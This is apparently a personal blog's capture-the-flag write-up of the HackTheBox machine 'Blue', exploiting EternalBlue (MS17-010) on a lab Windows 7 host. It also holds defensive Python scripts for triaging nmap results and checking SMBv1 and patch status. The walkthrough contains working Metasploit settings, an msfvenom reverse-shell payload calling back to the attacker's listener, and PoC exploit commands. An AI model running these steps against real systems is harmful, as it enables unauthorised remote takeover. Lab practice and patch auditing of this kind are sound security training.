NETHRAN. WEDAGE

Cybersecurity undergraduate and web developer based in Sri Lanka, passionate about penetration testing, VAPT, and ethical hacking.

HackTheBox

HTB: Blue

02 Apr 2024 · Windows · 20 pts · Easy

EternalBlue (MS17-010) exploitation on a Windows target. Manual exploit without Metasploit — using Impacket and custom Python scripts.

HTB: Blue — Full Writeup

Blue is one of the most iconic machines on HackTheBox. It runs an unpatched Windows 7 system vulnerable to EternalBlue — the NSA-developed exploit leaked by the Shadow Brokers in 2017 that later powered WannaCry and NotPetya. It gives unauthenticated remote code execution directly as NT AUTHORITY\SYSTEM — no privilege escalation needed.

Machine Info

  • OS: Windows 7 SP1 x64
  • Difficulty: Easy
  • IP: 10.10.10.40
  • Key Vulnerability: SMBv1 — CVE-2017-0144 (MS17-010 EternalBlue)

Step 1 — Enumeration

Start with a full Nmap scan to identify open ports and service versions:

nmap -sV -sC -p- --min-rate 5000 10.10.10.40

Key results from the scan:

  • Port 135 — Microsoft RPC
  • Port 139 — NetBIOS / SMB
  • Port 445 — Microsoft-DS (SMBv1, Windows 7 SP1)
  • Ports 49152–49157 — various RPC endpoints

The standout finding is port 445 running SMBv1 on Windows 7 SP1 — a textbook EternalBlue candidate. SMBv1 is a legacy protocol that should never be enabled on modern systems.

Step 2 — SMB Vulnerability Check

Confirm the target is vulnerable to MS17-010 using Nmap's built-in SMB vuln scripts:

nmap --script smb-vuln-ms17-010 -p 445 10.10.10.40

The output confirms the host is vulnerable:

| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0144
|     Risk factor: HIGH

The vulnerability exists in the way SMBv1 handles certain transaction requests. A specially crafted packet triggers a buffer overflow, allowing arbitrary code execution as SYSTEM without any authentication.
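On an engagement or in an internal audit you rarely run the script against one host; you run it against a range and need the verdicts pulled out of the normal-format output. The following is an added example (not part of this writeup or of nmap) that parses output shaped like the block above, per host, into a structured finding with the MS17-010 state, CVE id, risk factor and the SMB banner from -sV, and sorts vulnerable hosts to the top with a remediation string. The sample output is constructed: the first host mirrors what the writeup shows for 10.10.10.40, the second (192.0.2.7, a documentation address) is a constructed host with SMBv1 off, on which the script reports that it could not negotiate a connection.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: nmap normal-format output in the shape the writeup shows,
# plus a second constructed host (RFC 5737 address) whose SMBv1 is off, for contrast.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.40
Host is up (0.020s latency).

PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0144
|     Risk factor: HIGH
|_    Disclosure date: 2017-03-14

Nmap scan report for 192.0.2.7
Host is up (0.010s latency).

PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Windows 10 microsoft-ds

Host script results:
|_smb-vuln-ms17-010: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
"""

HOST_HEADER = re.compile(r"^Nmap scan report for (\S+)", re.M)
SMB_445_LINE = re.compile(r"^445/tcp\s+open\s+\S+\s+(.*)$", re.M)
# OS families whose SMB stack defaults to SMBv1 enabled; a prioritisation hint only.
LEGACY_OS = re.compile(r"Windows (XP|Vista|7|Server 2003|Server 2008)\b")


@dataclass
class HostFinding:
    host: str
    smb_banner: str = ""
    ms17_010_state: str = "NOT_REPORTED"   # script output absent for this host
    cves: list = field(default_factory=list)
    risk: str = ""

    @property
    def vulnerable(self) -> bool:
        return self.ms17_010_state == "VULNERABLE"

    @property
    def legacy_smbv1_os(self) -> bool:
        # Heuristic from the -sV banner alone; it does not replace the script verdict.
        return bool(LEGACY_OS.search(self.smb_banner))


def parse_nmap_output(text: str) -> list:
    """Split normal-format nmap output per host and pull out the MS17-010 verdict."""
    findings = []
    headers = list(HOST_HEADER.finditer(text))
    for i, m in enumerate(headers):
        end = headers[i + 1].start() if i + 1 < len(headers) else len(text)
        block = text[m.end():end]
        f = HostFinding(host=m.group(1))
        banner = SMB_445_LINE.search(block)
        if banner:
            f.smb_banner = banner.group(1).strip()
        if "smb-vuln-ms17-010" in block:
            state = re.search(r"State:\s*(\S+)", block)
            f.ms17_010_state = state.group(1) if state else "UNKNOWN"
            f.cves = sorted(set(re.findall(r"CVE-\d{4}-\d{4,}", block)))
            risk = re.search(r"Risk factor:\s*(\S+)", block)
            f.risk = risk.group(1) if risk else ""
        findings.append(f)
    return findings


def remediation(f: HostFinding) -> str:
    """Defender-side action derived from the parsed verdict."""
    if f.vulnerable:
        return "Apply MS17-010 and disable SMBv1; restrict port 445 until patched"
    if f.ms17_010_state == "UNKNOWN":
        return "Script could not decide (SMBv1 likely off); confirm patch level on the host"
    return "No MS17-010 verdict; verify SMB exposure separately"


def triage(text: str) -> list:
    """Return (host, state, remediation) rows with vulnerable hosts first."""
    rows = [(f.host, f.ms17_010_state, remediation(f)) for f in parse_nmap_output(text)]
    return sorted(rows, key=lambda r: r[1] != "VULNERABLE")


if __name__ == "__main__":
    for row in triage(SAMPLE_NMAP_OUTPUT):
        print(*row, sep=" | ")
```

The script verdict is authoritative; the banner heuristic only helps order hosts for follow-up, since a "Windows 7" banner with the script unable to negotiate usually means SMBv1 has already been turned off.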

Step 3 — Exploitation (Metasploit)

Load the EternalBlue module in Metasploit:

msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.40
set LHOST 10.10.14.X   # your tun0 IP
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

Metasploit connects back with a Meterpreter session. Verify privileges:

getuid
Server username: NT AUTHORITY\SYSTEM

sysinfo
Computer: BLUE
OS: Windows 7 (Build 7601, Service Pack 1)

Direct SYSTEM — no privilege escalation needed.

Step 4 — Exploitation (Manual, no Metasploit)

For OSCP preparation, use the Python PoC from worawit's MS17-010 repository on GitHub. First check which named pipes are available on the target:

git clone https://github.com/worawit/MS17-010
cd MS17-010

# Identify usable named pipes
python checker.py 10.10.10.40

Generate a reverse shell payload with msfvenom, then set up a Netcat listener:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.X LPORT=4444 -f exe -o shell.exe
nc -lvnp 4444

Run the exploit, passing the generated payload:

python send_and_execute.py 10.10.10.40 shell.exe

The listener receives a shell as SYSTEM:

Microsoft Windows [Version 6.1.7601]
C:\Windows\system32> whoami
nt authority\system

Note: the worawit PoC requires Python 2 and the impacket library. Ensure your environment is configured correctly before attempting. If send_and_execute.py fails, try zzz_exploit.py with a named pipe identified by checker.py.

Step 5 — Flags

With a SYSTEM shell, grab both flags:

# User flag
type C:\Users\haris\Desktop\user.txt

# Root flag
type C:\Users\Administrator\Desktop\root.txt

Bonus — Alternative Script (zzz_exploit.py)

If send_and_execute.py does not work, worawit's zzz_exploit.py is an alternative that targets a specific named pipe. Edit the script to add your shellcode and specify the pipe name found by checker.py:

# Inside zzz_exploit.py, set the named pipe (e.g. samr, browser, netlogon)
# then run:
python zzz_exploit.py 10.10.10.40 samr

This approach gives more control over which pipe is targeted and can be more reliable on certain configurations.

Key Takeaways

  • SMBv1 should be disabled on all systems — it has no place in modern environments
  • CVE-2017-0144 requires no authentication and gives direct SYSTEM access
  • Nmap's smb-vuln-ms17-010 script is a fast and reliable way to confirm the vulnerability
  • Manual exploitation with the worawit PoC is essential practice for OSCP — Metasploit won't be available
  • The same exploit was used in the WannaCry ransomware attack in May 2017 — patch MS17-010 immediately
  • Alternate paths seen on other boxes (the distccd route, for example) don't apply here; EternalBlue is the only reliable vector on this box
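The two takeaways about disabling SMBv1 and patching MS17-010 are easy to state and easy to get wrong when checking a fleet of Windows 7 hosts. Below is an added example (my own, not from this writeup or from Microsoft) that turns host-side evidence into a verdict. It assumes the registry value Microsoft documents for switching the SMBv1 server off on Windows 7 / Server 2008 R2 (DWORD SMB1 under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters, 0 = disabled, value absent = default, which is enabled), and the two KB numbers that shipped the MS17-010 fix for that OS (KB4012212 security-only, KB4012215 monthly rollup). The reg query and wmic qfe outputs are constructed samples.

```python
import re

# Microsoft-documented switch for the SMBv1 server on Windows 7 / Server 2008 R2:
# HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters, DWORD SMB1 = 0.
# If the value is absent the default applies, and on Windows 7 the default is enabled.
SMB1_VALUE = re.compile(r"^\s*SMB1\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$", re.M)

# KBs that carried the MS17-010 fix for Windows 7 SP1 / Server 2008 R2
# (security-only and monthly rollup). Later cumulative rollups supersede them,
# so "none present" means "check rollup history", not "proven unpatched".
MS17_010_KBS = frozenset({"KB4012212", "KB4012215"})

# Constructed samples of:
#   reg query HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v SMB1
REG_SMB1_DISABLED = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
    SMB1    REG_DWORD    0x0
"""
REG_SMB1_ABSENT = "ERROR: The system was unable to find the specified registry key or value."

# Constructed samples of:  wmic qfe get HotFixID,InstalledOn
QFE_PATCHED = """\
HotFixID   InstalledOn
KB2533552  4/12/2012
KB4012212  3/15/2017
"""
QFE_UNPATCHED = """\
HotFixID   InstalledOn
KB2533552  4/12/2012
"""


def smb1_state(reg_output: str) -> str:
    """'disabled', 'enabled', or 'enabled_default' when the value is missing."""
    m = SMB1_VALUE.search(reg_output)
    if m is None:
        return "enabled_default"
    return "disabled" if int(m.group(1), 16) == 0 else "enabled"


def ms17_010_hotfixes(qfe_output: str) -> set:
    """KB identifiers in the hotfix list that belong to MS17-010."""
    installed = set(re.findall(r"\bKB\d{6,7}\b", qfe_output))
    return installed & MS17_010_KBS


def host_posture(reg_output: str, qfe_output: str) -> dict:
    """Combine both checks into the verdict a defender acts on."""
    smb1 = smb1_state(reg_output)
    kbs = ms17_010_hotfixes(qfe_output)
    if smb1 == "disabled":
        verdict = "not reachable over SMBv1; still apply MS17-010"
    elif kbs:
        verdict = "SMBv1 on but MS17-010 present; disable SMBv1 anyway"
    else:
        verdict = "SMBv1 on and no MS17-010 KB seen; check rollup history and patch now"
    return {"smb1": smb1, "ms17_010_kbs": sorted(kbs), "verdict": verdict}


if __name__ == "__main__":
    print(host_posture(REG_SMB1_ABSENT, QFE_UNPATCHED))
    print(host_posture(REG_SMB1_DISABLED, QFE_PATCHED))
```

Both checks are needed: a host with the KB installed but SMBv1 still on is not exposed to this bug, but remains exposed to the protocol's other weaknesses, which is why the verdict still says to disable it.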

Tools Used

  • nmap — port scanning, service enumeration, and vuln script (smb-vuln-ms17-010)
  • Metasploit — exploit/windows/smb/ms17_010_eternalblue
  • msfvenom — reverse shell payload generation
  • worawit/MS17-010 — manual Python PoC (checker.py, send_and_execute.py, zzz_exploit.py)
  • netcat — reverse shell listener
  • impacket — required dependency for the manual PoC